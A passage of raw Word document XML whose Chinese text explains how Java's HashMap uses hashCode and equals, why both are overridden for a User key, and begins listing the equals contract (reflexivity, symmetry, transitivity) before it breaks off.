          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法在对应位置的链表中找到需要的元素。所以，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法对于找到对应元素是两个关键方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A1305" w:rsidRDefault="000A1305" w:rsidP="000A1305">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以是任何类型的对象，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这种对象，为了保证两个具有相同属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>相同，我们就需要改写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法，比方把</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值的计算与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关联起来，那么只要</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象拥有相同</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，那么他们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也能保持一致了，这样就可以找到在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数组中的位置了。</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>如果这个位置上有多个元素，还需要用</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法在对应位置的链表中找到需要的元素，所以只改写了</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法是不够的，</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法也是需要改写滴</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当然啦，按正常思维逻辑，</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法一般都会根据实际的业务内容来定义，例如根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来判断两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00491E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是否相等</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在改写</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>equals</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法的时候，需要满足以下三点：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>自反性：就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a.equals(a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>必须为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对称性：就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a.equals(b)=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>b.equals(a)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>也必须为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(3) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传递性：就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="362E2B"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>a.equals(b)=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
